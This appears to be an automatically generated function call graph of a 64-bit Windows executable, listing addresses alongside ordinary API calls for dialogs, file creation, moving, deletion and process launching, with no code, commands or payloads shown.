21774->21781 21775 7ff70ecf2a38 22132 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 21775->22132 21776 7ff70ecd13c4 33 API calls 21777 7ff70ecf178a GetTempPathW 21776->21777 21777->21889 21784 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21778->21784 21779 7ff70ecd7a28 35 API calls 21779->21889 22130 7ff70ecee738 33 API calls 3 library calls 21781->22130 21790 7ff70ecf2a6e 21784->21790 21785 7ff70ecd2120 SetWindowTextW 21785->21889 21788 7ff70ecf29dd 21795 7ff70ecd1b70 31 API calls 21788->21795 21796 7ff70ecf29f4 memcpy_s 21788->21796 21789 7ff70ecff094 43 API calls 21789->21889 21797 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21790->21797 21792 7ff70ecd1b70 31 API calls 21792->21772 21793 7ff70ecd1c04 33 API calls 21793->21889 21794 7ff70ecf2343 21794->21772 21794->21775 21798 7ff70ecf5ae0 4 API calls 21794->21798 21805 7ff70ecf238b memcpy_s 21794->21805 21795->21796 21796->21792 21799 7ff70ecf2a74 21797->21799 21798->21805 21804 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21799->21804 21801 7ff70ecd1c80 33 API calls 21801->21889 21802 7ff70ecee558 33 API calls 21802->21889 21803 7ff70ecf2abc 22138 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 21803->22138 21809 7ff70ecf2a7a 21804->21809 21814 7ff70ecd1c80 33 API calls 21805->21814 21859 7ff70ecf26df 21805->21859 21807 7ff70ecd1b70 31 API calls 21807->21770 21808 7ff70ecf2ac8 22140 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 21808->22140 21820 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21809->21820 21810 7ff70ecf2ac2 22139 7ff70ecd1b50 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 21810->22139 21811 7ff70ecd1c80 33 API calls 21845 7ff70ecf0fd9 21811->21845 21813 7ff70ecf2ab6 22137 7ff70ecd1b50 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 21813->22137 21821 7ff70ecf24b3 21814->21821 21817 7ff70ecf2890 21817->21808 21817->21810 21833 7ff70ecf288b memcpy_s 21817->21833 21838 7ff70ecf5ae0 4 API calls 21817->21838 21819 7ff70ecf277a 21819->21803 21819->21813 21828 7ff70ecf27c2 memcpy_s 21819->21828 21819->21833 21835 7ff70ecf5ae0 4 API calls 21819->21835 21826 7ff70ecf2a80 21820->21826 21834 7ff70ecd12bc 33 API calls 21821->21834 21868 7ff70ecf2ab0 21821->21868 21822 7ff70ecd2274 31 API calls 21822->21889 21825 7ff70eced6d8 31 API calls 21825->21889 21839 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21826->21839 21827 7ff70ecd5ff4 51 API calls 21827->21889 22051 7ff70ecf3030 21828->22051 21830 7ff70ecf1139 GetDlgItem 21837 7ff70ecd2120 SetWindowTextW 21830->21837 21833->21807 21840 7ff70ecf24f6 21834->21840 21835->21828 21841 7ff70ecf1158 SendMessageW 21837->21841 21838->21833 21842 7ff70ecf2a86 21839->21842 22126 7ff70ecdd124 21840->22126 21841->21845 21848 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21842->21848 21845->21760 21845->21811 21849 7ff70ecf118c SendMessageW 21845->21849 21845->21889 21897 7ff70ecd1b70 31 API calls 21845->21897 22093 7ff70ecd8ebc 47 API calls memcpy_s 21845->22093 22096 7ff70ecd2274 31 API calls _invalid_parameter_noinfo_noreturn 21845->22096 22097 7ff70ecedf84 145 API calls 2 library calls 21845->22097 21846 7ff70ecd72ac 53 API calls 21846->21889 21847 7ff70ecddb98 33 API calls 21847->21889 21852 7ff70ecf2a8c 21848->21852 21849->21845 21850 7ff70ecd5790 51 API calls 21850->21889 21851 7ff70ecd62f0 54 API calls 21851->21889 21856 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21852->21856 21855 7ff70ecd1b70 31 API calls 21855->21889 21862 7ff70ecf2a92 21856->21862 21857 7ff70ecd885c 8 API calls 21857->21889 21858 7ff70ecf2aa4 21860 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21858->21860 21859->21817 21859->21819 21859->21858 21863 7ff70ecf2aaa 21859->21863 21860->21863 21861 7ff70ecd2314 33 API calls 21861->21889 21869 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21862->21869 21864 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21863->21864 21864->21868 21865 7ff70ecd5238 33 API calls 21865->21889 21866 7ff70ecf14ae SHFileOperationW 21866->21889 22136 7ff70ecd353c 47 API calls 21868->22136 21872 7ff70ecf2a98 21869->21872 21870 7ff70ecd6dd8 33 API calls 21870->21889 21871 7ff70ecd587c 51 API calls 21871->21889 21875 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21872->21875 21873 7ff70ecd71f4 33 API calls 21873->21889 21874 7ff70ecd52c0 33 API calls 21874->21889 21877 7ff70ecf2a9e 21875->21877 21876 7ff70ecd210c SetDlgItemTextW 21876->21889 21881 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21877->21881 21879 7ff70ecd8b28 47 API calls 21879->21889 21881->21858 21883 7ff70ecd1b70 31 API calls 21891 7ff70ecf2521 21883->21891 21884 7ff70ecd12bc 33 API calls 21884->21889 21885 7ff70ecd12bc 33 API calls 21885->21891 21888 7ff70ece0aa0 CompareStringW 21888->21891 21889->21749 21889->21753 21889->21755 21889->21758 21889->21762 21889->21764 21889->21767 21889->21770 21889->21771 21889->21776 21889->21778 21889->21779 21889->21785 21889->21789 21889->21790 21889->21793 21889->21794 21889->21799 21889->21801 21889->21802 21889->21809 21889->21822 21889->21825 21889->21826 21889->21827 21889->21842 21889->21845 21889->21846 21889->21847 21889->21850 21889->21851 21889->21852 21889->21855 21889->21857 21889->21861 21889->21862 21889->21865 21889->21866 21889->21870 21889->21871 21889->21873 21889->21874 21889->21876 21889->21879 21889->21884 21890 7ff70ecd5890 51 API calls 21889->21890 21892 7ff70ecf1ae9 EndDialog 21889->21892 21895 7ff70ecf1671 MoveFileW 21889->21895 21898 7ff70ecd552c 56 API calls 21889->21898 22050 7ff70ece0aa0 CompareStringW 21889->22050 22090 7ff70ecdce9c 35 API calls _invalid_parameter_noinfo_noreturn 21889->22090 22091 7ff70eced26c 33 API calls Concurrency::cancel_current_task 21889->22091 22092 7ff70ecf3f3c 31 API calls _invalid_parameter_noinfo_noreturn 21889->22092 22094 7ff70ecee384 33 API calls _invalid_parameter_noinfo_noreturn 21889->22094 22095 7ff70eced154 33 API calls 21889->22095 22098 7ff70ecee738 33 API calls 3 library calls 21889->22098 22099 7ff70ecd88f8 21889->22099 22115 7ff70ecd6448 33 API calls 21889->22115 22116 7ff70ecd7d6c 33 API calls 3 library calls 21889->22116 22117 7ff70ecd1734 33 API calls 4 library calls 21889->22117 22118 7ff70ecd1170 33 API calls memcpy_s 21889->22118 22119 7ff70ecd6260 FindClose 21889->22119 22120 7ff70ece0ad0 CompareStringW 21889->22120 22121 7ff70eced848 47 API calls 21889->22121 22122 7ff70ecec414 51 API calls 3 library calls 21889->22122 22123 7ff70ecee6a4 33 API calls _handle_error 21889->22123 22124 7ff70ecd7254 CompareStringW 21889->22124 22125 7ff70ecd8be4 47 API calls 21889->22125 21890->21889 21891->21859 21891->21872 21891->21877 21891->21883 21891->21885 21891->21888 21894 7ff70ecdd124 33 API calls 21891->21894 21892->21889 21894->21891 21895->21845 21896 7ff70ecf16a5 MoveFileExW 21895->21896 21896->21845 21897->21845 21898->21889 21901 7ff70ecf34dd 21900->21901 21902 7ff70ecd1c80 33 API calls 21901->21902 21903 7ff70ecf34f3 21902->21903 21904 7ff70ecf3528 21903->21904 21905 7ff70ecd1c80 33 API calls 21903->21905 22152 7ff70ece9a70 21904->22152 21905->21904 22345 7ff70ecec12c 21908->22345 21911 7ff70ecf3007 21913 7ff70ecf5c30 _handle_error 8 API calls 21911->21913 21912 7ff70ecf2f17 GetWindow 21917 7ff70ecf2f32 21912->21917 21914 7ff70ecef9eb 21913->21914 21914->21377 21914->21378 21915 7ff70ecf2f3e GetClassNameW 22350 7ff70ece0aa0 CompareStringW 21915->22350 21917->21911 21917->21915 21918 7ff70ecf2fe6 GetWindow 21917->21918 21919 7ff70ecf2f67 GetWindowLongPtrW 21917->21919 21918->21911 21918->21917 21919->21918 21920 7ff70ecf2f79 SendMessageW 21919->21920 21920->21918 21921 7ff70ecf2f95 GetObjectW 21920->21921 22351 7ff70ecec194 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 21921->22351 21923 7ff70ecf2fb1 22352 7ff70ecec15c 21923->22352 22356 7ff70ececa30 16 API calls _handle_error 21923->22356 21926 7ff70ecf2fc9 SendMessageW DeleteObject 21926->21918 21928 7ff70ecd2127 21927->21928 21929 7ff70ecd212a SetWindowTextW 21927->21929 21928->21929 21930->21398 21932 7ff70ecd2344 21931->21932 21939 7ff70ecd23f8 21931->21939 21933 7ff70ecd2352 memcpy_s 21932->21933 21936 7ff70ecd23f3 21932->21936 21938 7ff70ecd23a1 21932->21938 21933->21415 22359 7ff70ecd1b50 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 21936->22359 21938->21933 21940 7ff70ecf5ae0 4 API calls 21938->21940 22360 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 21939->22360 21940->21933 21941->21426 21942->21469 21944 7ff70ecd5890 51 API calls 21943->21944 21945 7ff70ecd5885 21944->21945 21945->21470 21945->21497 21946->21470 21948 7ff70ecd13c4 33 API calls 21947->21948 21949 7ff70ecd7c45 21948->21949 21950 7ff70ecd7c48 GetModuleFileNameW 21949->21950 21953 7ff70ecd7c98 21949->21953 21951 7ff70ecd7c63 21950->21951 21952 7ff70ecd7c9a 21950->21952 21951->21949 21952->21953 21954 7ff70ecd12bc 33 API calls 21953->21954 21955 7ff70ecd7cc2 21954->21955 21956 7ff70ecd7cfa 21955->21956 21957 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21955->21957 21956->21539 21958 7ff70ecd7d1c 21957->21958 21959->21554 21960->21586 21961->21597 21962->21609 21963->21614 21964->21623 21966 7ff70ecf6df0 21965->21966 21966->21626 21967->21557 21968->21584 21970->21511 21971->21643 21972->21672 21973->21684 21974->21699 21976 7ff70ecd61e8 swprintf 46 API calls 21975->21976 21977 7ff70ecda909 21976->21977 21978 7ff70ece0688 WideCharToMultiByte 21977->21978 21979 7ff70ecda919 21978->21979 21980 7ff70ecda989 21979->21980 21991 7ff70ecd9c00 31 API calls 21979->21991 21997 7ff70ecda96a SetDlgItemTextW 21979->21997 22000 7ff70ecd9808 21980->22000 21983 7ff70ecdaa03 21986 7ff70ecdaac2 21983->21986 21987 7ff70ecdaa0c GetWindowLongPtrW 21983->21987 21984 7ff70ecdaaf2 GetSystemMetrics GetWindow 21985 7ff70ecdac21 21984->21985 21998 7ff70ecdab1d 21984->21998 21988 7ff70ecf5c30 _handle_error 8 API calls 21985->21988 22016 7ff70ecd99a8 21986->22016 22015 7ff70ed3f270 21987->22015 21992 7ff70ecdac30 21988->21992 21991->21979 21992->21712 21993 7ff70ecdaaaa GetWindowRect 21993->21986 21995 7ff70ecdab3e GetWindowRect 21995->21998 21996 7ff70ecdaae5 SetWindowTextW 21996->21984 21997->21979 21998->21985 21998->21995 21999 7ff70ecdac00 GetWindow 21998->21999 21999->21985 21999->21998 22001 7ff70ecd99a8 47 API calls 22000->22001 22005 7ff70ecd984f 22001->22005 22002 7ff70ecd995a 22003 7ff70ecf5c30 _handle_error 8 API calls 22002->22003 22004 7ff70ecd998e GetWindowRect GetClientRect 22003->22004 22004->21983 22004->21984 22005->22002 22006 7ff70ecd12bc 33 API calls 22005->22006 22007 7ff70ecd989c 22006->22007 22008 7ff70ecd12bc 33 API calls 22007->22008 22014 7ff70ecd99a1 22007->22014 22011 7ff70ecd9914 22008->22011 22009 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22010 7ff70ecd99a7 22009->22010 22011->22002 22012 7ff70ecd999c 22011->22012 22013 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22012->22013 22013->22014 22014->22009 22015->21993 22017 7ff70ecd61e8 swprintf 46 API calls 22016->22017 22018 7ff70ecd99eb 22017->22018 22019 7ff70ece0688 WideCharToMultiByte 22018->22019 22020 7ff70ecd9a03 22019->22020 22021 7ff70ecd9c00 31 API calls 22020->22021 22022 7ff70ecd9a1b 22021->22022 22023 7ff70ecf5c30 _handle_error 8 API calls 22022->22023 22024 7ff70ecd9a2b 22023->22024 22024->21984 22024->21996 22026 7ff70ecd13c4 33 API calls 22025->22026 22027 7ff70ecd2062 GetWindowTextW 22026->22027 22028 7ff70ecd2094 22027->22028 22029 7ff70ecd12bc 33 API calls 22028->22029 22030 7ff70ecd20a2 22029->22030 22032 7ff70ecd2105 22030->22032 22034 7ff70ecd20dd 22030->22034 22031 7ff70ecf5c30 _handle_error 8 API calls 22033 7ff70ecd20f3 22031->22033 22035 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22032->22035 22033->21721 22034->22031 22036 7ff70ecd210a 22035->22036 22038 7ff70ecd610f 22037->22038 22039 7ff70ecd61da 22037->22039 22043 7ff70ecd611f memcpy_s 22038->22043 22044 7ff70ecd5004 33 API calls 2 library calls 22038->22044 22045 7ff70ecd353c 47 API calls 22039->22045 22043->21742 22044->22043 22047 7ff70ecee57f 22046->22047 22048 7ff70ecee586 22046->22048 22047->21889 22048->22047 22141 7ff70ecd1734 33 API calls 4 library calls 22048->22141 22050->21889 22055 7ff70ecf3079 memcpy_s 22051->22055 22067 7ff70ecf33cd 22051->22067 22052 7ff70ecd1b70 31 API calls 22053 7ff70ecf33ec 22052->22053 22054 7ff70ecf5c30 _handle_error 8 API calls 22053->22054 22056 7ff70ecf33f8 22054->22056 22057 7ff70ecf31d4 22055->22057 22148 7ff70ece0aa0 CompareStringW 22055->22148 22056->21833 22059 7ff70ecd12bc 33 API calls 22057->22059 22060 7ff70ecf3210 22059->22060 22061 7ff70ecd587c 51 API calls 22060->22061 22062 7ff70ecf321a 22061->22062 22063 7ff70ecd1b70 31 API calls 22062->22063 22068 7ff70ecf3225 22063->22068 22064 7ff70ecf3292 ShellExecuteExW 22065 7ff70ecf32a5 22064->22065 22066 7ff70ecf3396 22064->22066 22069 7ff70ecf32c4 IsWindowVisible 22065->22069 22070 7ff70ecf32de WaitForInputIdle 22065->22070 22072 7ff70ecf3333 CloseHandle 22065->22072 22066->22067 22075 7ff70ecf344b 22066->22075 22067->22052 22068->22064 22071 7ff70ecd12bc 33 API calls 22068->22071 22069->22070 22073 7ff70ecf32d1 ShowWindow 22069->22073 22142 7ff70ecf3928 22070->22142 22076 7ff70ecf3267 22071->22076 22079 7ff70ecf3351 22072->22079 22080 7ff70ecf3342 22072->22080 22073->22070 22077 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22075->22077 22149 7ff70ecd72ac 53 API calls 2 library calls 22076->22149 22082 7ff70ecf3450 22077->22082 22079->22066 22089 7ff70ecf3387 ShowWindow 22079->22089 22150 7ff70ece0aa0 CompareStringW 22080->22150 22081 7ff70ecf32f6 22081->22072 22086 7ff70ecf3304 GetExitCodeProcess 22081->22086 22083 7ff70ecf3275 22085 7ff70ecd1b70 31 API calls 22083->22085 22088 7ff70ecf327f 22085->22088 22086->22072 22087 7ff70ecf3317 22086->22087 22087->22072 22088->22064 22089->22066 22090->21889 22091->21889 22092->21889 22093->21845 22094->21889 22095->21889 22097->21830 22098->21889 22100 7ff70ecd8936 22099->22100 22101 7ff70ecd2314 33 API calls 22100->22101 22103 7ff70ecd8946 22101->22103 22102 7ff70ecd8987 22104 7ff70ecd1c04 33 API calls 22102->22104 22103->22102 22151 7ff70ecd1734 33 API calls 4 library calls 22103->22151 22106 7ff70ecd89cd 22104->22106 22107 7ff70ecd89f0 22106->22107 22108 7ff70ecd1c80 33 API calls 22106->22108 22109 7ff70ecd8a28 22107->22109 22111 7ff70ecd8a44 22107->22111 22108->22107 22110 7ff70ecf5c30 _handle_error 8 API calls 22109->22110 22112 7ff70ecd8a39 22110->22112 22113 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22111->22113 22112->21889 22114 7ff70ecd8a49 22113->22114 22115->21889 22116->21889 22117->21866 22118->21889 22120->21889 22121->21889 22122->21889 22123->21889 22124->21889 22125->21889 22128 7ff70ecdd156 22126->22128 22127 7ff70ecdd18a 22127->21891 22128->22127 22129 7ff70ecd1734 33 API calls 22128->22129 22129->22128 22130->21788 22141->22048 22143 7ff70ecf397b WaitForSingleObject 22142->22143 22144 7ff70ecf3933 PeekMessageW 22143->22144 22145 7ff70ecf398d 22143->22145 22146 7ff70ecf394f GetMessageW TranslateMessage DispatchMessageW 22144->22146 22147 7ff70ecf3978 22144->22147 22145->22081 22146->22147 22147->22143 22148->22057 22149->22083 22150->22079 22151->22102 22153 7ff70ece9a80 memcpy_s _snwprintf 22152->22153 22170 7ff70ecdbb9c 22153->22170 22155 7ff70ece9b1e memcpy_s 22173 7ff70ece9518 22155->22173 22159 7ff70ece9b88 22160 7ff70ece9bcb 22159->22160 22162 7ff70ece9cf4 22159->22162 22184 7ff70ece9cfc 22160->22184 22164 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22162->22164 22165 7ff70ece9cf9 22164->22165 22167 7ff70ecf5c30 _handle_error 8 API calls 22168 7ff70ece9cde 22167->22168 22168->21612 22169 7ff70ece9bd9 22169->22167 22171 7ff70ecd13c4 33 API calls 22170->22171 22172 7ff70ecdbbc1 22171->22172 22172->22155 22174 7ff70ece959f memcpy_s 22173->22174 22175 7ff70ecd1b70 31 API calls 22174->22175 22176 7ff70ece97d0 memcpy_s 22174->22176 22175->22176 22177 7ff70ece986f 22176->22177 22212 7ff70ece7fa8 33 API calls 22176->22212 22179 7ff70ecdbbf8 22177->22179 22180 7ff70ecdbc06 shared_ptr 22179->22180 22181 7ff70ecdbc39 22180->22181 22182 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22180->22182 22181->22159 22183 7ff70ecdbc5a 22182->22183 22185 7ff70ece9d0a 22184->22185 22186 7ff70ece9bd5 22185->22186 22213 7ff70ecd3c7c 82 API calls 22185->22213 22186->22169 22188 7ff70ece6d28 22186->22188 22214 7ff70ece76f8 22188->22214 22191 7ff70ece6f54 22194 7ff70ece6f52 22191->22194 22251 7ff70ecd3ca0 100 API calls 22191->22251 22195 7ff70ecf5c30 _handle_error 8 API calls 22194->22195 22197 7ff70ece6fa2 22195->22197 22196 7ff70ecd2314 33 API calls 22200 7ff70ece6d85 22196->22200 22197->22169 22198 7ff70ece1dd0 64 API calls 22198->22200 22199 7ff70ecd6288 55 API calls 22199->22200 22200->22194 22200->22196 22200->22198 22200->22199 22202 7ff70ece6fc4 22200->22202 22204 7ff70ece6ea0 22200->22204 22205 7ff70ece6fbf 22200->22205 22201 7ff70ece6f1f 22243 7ff70ece524c 22201->22243 22207 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22202->22207 22204->22201 22204->22202 22204->22205 22208 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22205->22208 22206 7ff70ece6f37 22206->22191 22210 7ff70ece6f43 22206->22210 22209 7ff70ece6fca 22207->22209 22208->22202 22250 7ff70ecd39e0 82 API calls 22210->22250 22212->22177 22213->22186 22215 7ff70ecd6288 55 API calls 22214->22215 22216 7ff70ece7760 22215->22216 22217 7ff70ece4e68 107 API calls 22216->22217 22221 7ff70ece777b 22216->22221 22218 7ff70ece7777 22217->22218 22218->22221 22252 7ff70ece9db0 22218->22252 22219 7ff70ece79a6 22222 7ff70ecf5c30 _handle_error 8 API calls 22219->22222 22221->22219 22224 7ff70ece79db 22221->22224 22225 7ff70ece6d5a 22222->22225 22227 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22224->22227 22225->22191 22225->22200 22249 7ff70ecd39e0 82 API calls 22225->22249 22229 7ff70ece79e0 22227->22229 22244 7ff70ece528a 22243->22244 22246 7ff70ece5280 22243->22246 22244->22246 22248 7ff70ecd4c40 101 API calls 22244->22248 22245 7ff70ece52ae 22247 7ff70ecd4d50 101 API calls 22245->22247 22246->22206 22247->22246 22248->22245 22249->22200 22250->22194 22261 7ff70ecd4c40 101 API calls 22252->22261 22253 7ff70ece9de5 22262 7ff70ecd4a70 104 API calls 22253->22262 22254 7ff70ece9e51 22256 7ff70ecf5c30 _handle_error 8 API calls 22254->22256 22255 7ff70ece9e00 22255->22254 22259 7ff70ecd4c40 101 API calls 22255->22259 22257 7ff70ece778f 22256->22257 22263 7ff70ecd45f0 22257->22263 22258 7ff70ece9e36 22260 7ff70ecd4a70 104 API calls 22258->22260 22259->22258 22260->22254 22261->22253 22262->22255 22346 7ff70ecec15c 4 API calls 22345->22346 22347 7ff70ecec13a 22346->22347 22348 7ff70ecec149 22347->22348 22357 7ff70ecec194 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 22347->22357 22348->21911 22348->21912 22350->21917 22351->21923 22353 7ff70ecec16e 22352->22353 22355 7ff70ecec173 22352->22355 22358 7ff70ecec1cc GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 22353->22358 22355->21923 22356->21926 22357->22348 22358->22355 22381 7ff70ecff40c 22388 7ff70ed00470 22381->22388 22393 7ff70ed00950 35 API calls 2 library calls 22388->22393 22390 7ff70ed0047b 22394 7ff70ed00570 35 API calls abort 22390->22394 22393->22390 22402 7ff70ecf5a00 22403 7ff70ecf5a16 _com_error::_com_error 22402->22403 22408 7ff70ecf7848 22403->22408 22405 7ff70ecf5a27 22406 7ff70ecf5390 _com_raise_error 14 API calls 22405->22406 22407 7ff70ecf5a73 22406->22407 22409 7ff70ecf7884 RtlPcToFileHeader 22408->22409 22412 7ff70ecf7867 22408->22412 22410 7ff70ecf78ab RaiseException 22409->22410 22411 7ff70ecf789c 22409->22411 22410->22405 22411->22410 22412->22409 22919 7ff70ecd5db8 22920 7ff70ecd5dfa 22919->22920 22921 7ff70ecd5890 51 API calls 22920->22921 22922 7ff70ecd5e2d 22921->22922 22923 7ff70ecd5e44 CreateFileW 22922->22923 22925 7ff70ecd5ff4 51 API calls 22922->22925 22926 7ff70ecd5e8f 22923->22926 22932 7ff70ecd5f29 22923->22932 22925->22923 22927 7ff70ecd80b0 49 API calls 22926->22927 22928 7ff70ecd5eb2 22927->22928 22930 7ff70ecd5eee 22928->22930 22931 7ff70ecd5eb8 CreateFileW 22928->22931 22929 7ff70ecd5f81 SetFileTime CloseHandle 22933 7ff70ecd5fc1 22929->22933 22934 7ff70ecd5fcc 22929->22934 22930->22932 22937 7ff70ecd5fec 22930->22937 22931->22930 22932->22929 22932->22934 22935 7ff70ecd5ff4 51 API calls 22933->22935 22936 7ff70ecf5c30 _handle_error 8 API calls 22934->22936 22935->22934 22938 7ff70ecd5fd8 22936->22938 22939 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22937->22939 22940 7ff70ecd5ff1 22939->22940 20717 7ff70ecde760 20720 7ff70ecde7c0 SystemTimeToFileTime 20717->20720 20721 7ff70ecde832 20720->20721 20722 7ff70ecde8b7 20720->20722 20729 7ff70ecd6768 20721->20729 20724 7ff70ecf5c30 _handle_error 8 API calls 20722->20724 20726 7ff70ecde7bb 20724->20726 20727 7ff70ecde842 LocalFileTimeToFileTime 20727->20722 20728 7ff70ecde84e FileTimeToSystemTime TzSpecificLocalTimeToSystemTime SystemTimeToFileTime SystemTimeToFileTime 20728->20722 20730 7ff70ecd678c GetVersionExW 20729->20730 20731 7ff70ecd67bf 20729->20731 20730->20731 20732 7ff70ecf5c30 _handle_error 8 API calls 20731->20732 20733 7ff70ecd67ec 20732->20733 20733->20727 20733->20728 20873 7ff70ece3e60 20874 7ff70ece3ec2 20873->20874 20877 7ff70ece3f05 20873->20877 20922 7ff70ece4ee4 20874->20922 20878 7ff70ece3fb4 20877->20878 20938 7ff70ecd4c40 20877->20938 20880 7ff70ece3fe0 20878->20880 20899 7ff70ece4049 20878->20899 20882 7ff70ece4023 20880->20882 20886 7ff70ece3fea 20880->20886 20944 7ff70ece5b60 20882->20944 20884 7ff70ece4ee4 59 API calls 20888 7ff70ece3ee2 20884->20888 20976 7ff70ecd4160 82 API calls 20886->20976 20888->20877 20891 7ff70ece3ee6 20888->20891 20890 7ff70ece3f98 20921 7ff70ecd4c40 101 API calls 20890->20921 20975 7ff70ecd3a9c 99 API calls 20891->20975 20894 7ff70ece3efc 20896 7ff70ecf5c30 _handle_error 8 API calls 20894->20896 20895 7ff70ece4031 20900 7ff70ece4168 20895->20900 21007 7ff70ecd3c7c 82 API calls 20895->21007 20901 7ff70ece42f0 20896->20901 20897 7ff70ece4000 20897->20894 20902 7ff70ece4940 106 API calls 20897->20902 20898 7ff70ece4d74 104 API calls 20898->20895 20915 7ff70ece412c 20899->20915 20991 7ff70ece511c 20899->20991 21000 7ff70ece00f0 20899->21000 21003 7ff70ece4d74 20899->21003 20908 7ff70ece41fd 20900->20908 21008 7ff70ece8db4 8 API calls 20900->21008 20905 7ff70ece4013 20902->20905 20977 7ff70ecd5790 20905->20977 20909 7ff70ece4244 20908->20909 21009 7ff70ecd38e0 82 API calls 2 library calls 20908->21009 20910 7ff70ece42c1 20909->20910 20914 7ff70ece42cf 20909->20914 21010 7ff70ecd4e00 SetEndOfFile 20909->21010 20910->20914 20955 7ff70ece4940 20910->20955 20914->20894 20916 7ff70ecd5790 51 API calls 20914->20916 20915->20895 20915->20898 20916->20894 20918 7ff70ece418e 20918->20908 20919 7ff70ece511c 120 API calls 20918->20919 20919->20918 20921->20878 20923 7ff70ecd6288 55 API calls 20922->20923 20924 7ff70ece4f42 20923->20924 20925 7ff70ece4f5b 20924->20925 20927 7ff70ece4f53 20924->20927 20926 7ff70ecf5ae0 4 API calls 20925->20926 20929 7ff70ece4f65 20926->20929 21027 7ff70ecd5db0 51 API calls 2 library calls 20927->21027 21011 7ff70ecd4334 20929->21011 20932 7ff70ece4ffb 20933 7ff70ecf5c30 _handle_error 8 API calls 20932->20933 20935 7ff70ece3ec7 20933->20935 20934 7ff70ece5023 20936 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20934->20936 20935->20877 20963 7ff70ecd552c 20935->20963 20937 7ff70ece5028 20936->20937 21028 7ff70ecd491c 20938->21028 20941 7ff70ecd4c67 20943 7ff70ecd4e00 SetEndOfFile 20941->20943 20943->20890 20945 7ff70ece5b99 20944->20945 20946 7ff70ece511c 120 API calls 20945->20946 20950 7ff70ece00f0 SendDlgItemMessageW 20945->20950 20951 7ff70ece5e0e 20945->20951 20952 7ff70ece5d91 20945->20952 21036 7ff70ece6294 20945->21036 21058 7ff70ece6b60 20945->21058 21067 7ff70ecd4d50 20945->21067 21076 7ff70ece699c 125 API calls _handle_error 20945->21076 20946->20945 20950->20945 20951->20895 20952->20951 20953 7ff70ece4d74 104 API calls 20952->20953 20953->20951 20956 7ff70ece495a 20955->20956 20958 7ff70ece49b2 20955->20958 21088 7ff70ecd4c70 20956->21088 20959 7ff70ece4a2d 20958->20959 21099 7ff70ecd5ff4 20958->21099 20959->20914 20960 7ff70ece499e 21093 7ff70ecd42d0 20960->21093 20964 7ff70ecd5671 20963->20964 20971 7ff70ecd5562 20963->20971 20965 7ff70ecf5c30 _handle_error 8 API calls 20964->20965 20966 7ff70ecd5687 20965->20966 20966->20884 20967 7ff70ecd564b 20967->20964 20968 7ff70ecd5c60 56 API calls 20967->20968 20968->20964 20969 7ff70ecd12bc 33 API calls 20969->20971 20971->20967 20971->20969 20972 7ff70ecd569c 20971->20972 21114 7ff70ecd5c60 20971->21114 20973 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20972->20973 20974 7ff70ecd56a1 20973->20974 20975->20894 20976->20897 20978 7ff70ecd57bb DeleteFileW 20977->20978 20979 7ff70ecd57b8 20977->20979 20980 7ff70ecd57d1 20978->20980 20988 7ff70ecd5850 20978->20988 20979->20978 20982 7ff70ecd80b0 49 API calls 20980->20982 20981 7ff70ecf5c30 _handle_error 8 API calls 20983 7ff70ecd5865 20981->20983 20984 7ff70ecd57f6 20982->20984 20983->20894 20985 7ff70ecd57fa DeleteFileW 20984->20985 20986 7ff70ecd5817 20984->20986 20985->20986 20987 7ff70ecd5875 20986->20987 20986->20988 20989 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20987->20989 20988->20981 20990 7ff70ecd587a 20989->20990 20992 7ff70ece5137 20991->20992 20998 7ff70ece512f 20991->20998 20995 7ff70ece518a 20992->20995 20992->20998 21148 7ff70ece53bc 20992->21148 20995->20998 21176 7ff70ece8d6c 8 API calls 20995->21176 20997 7ff70ece51e1 21177 7ff70ecd3df0 99 API calls 2 library calls 20997->21177 20998->20899 21000->20899 21001 7ff70ecf3a80 21000->21001 21002 7ff70ecf3a8f SendDlgItemMessageW 21001->21002 21005 7ff70ece4dad 21003->21005 21004 7ff70ece4dd3 21004->20899 21005->21004 21341 7ff70ecd4e18 21005->21341 21007->20900 21008->20918 21009->20909 21010->20910 21014 7ff70ecd436a 21011->21014 21012 7ff70ecd439e 21016 7ff70ecd447f 21012->21016 21017 7ff70ecd80b0 49 API calls 21012->21017 21013 7ff70ecd43b1 CreateFileW 21013->21012 21014->21012 21014->21013 21015 7ff70ecd44af 21018 7ff70ecf5c30 _handle_error 8 API calls 21015->21018 21016->21015 21020 